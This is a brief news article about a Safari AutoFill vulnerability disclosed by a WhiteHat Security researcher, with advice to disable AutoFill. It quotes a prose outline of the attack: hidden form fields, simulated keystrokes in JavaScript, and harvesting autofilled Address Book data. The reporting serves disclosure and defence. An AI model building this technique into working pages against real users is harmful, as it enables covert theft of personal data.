A new security vulnerability has been discovered in Safari, the default Apple browser. The security flaw is attributed to the AutoFill feature in the browser, and it allows malicious websites to collect personal information from a user’s Address Book such as first name, last name, work place, city, state, and email address.
WhiteHat Security researcher Jeremiah Grossman posted all the details of the vulnerability on his blog yesterday along with a link to a proof of concept webpage, where users can determine whether or not they are vulnerable.
Grossman explains:
“All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript. When data is populated, that is AutoFill’ed, it can be accessed and sent to the attacker.”
Grossman indicated that he submitted details of the vulnerability to Apple on June 17. However, besides an automated response, the Cupertino-based company has yet to acknowledge the issue. Users are recommended to disable the AutoFill feature, which has been enabled by default.
Watch Demo Video:
We’ll update when we learn new information.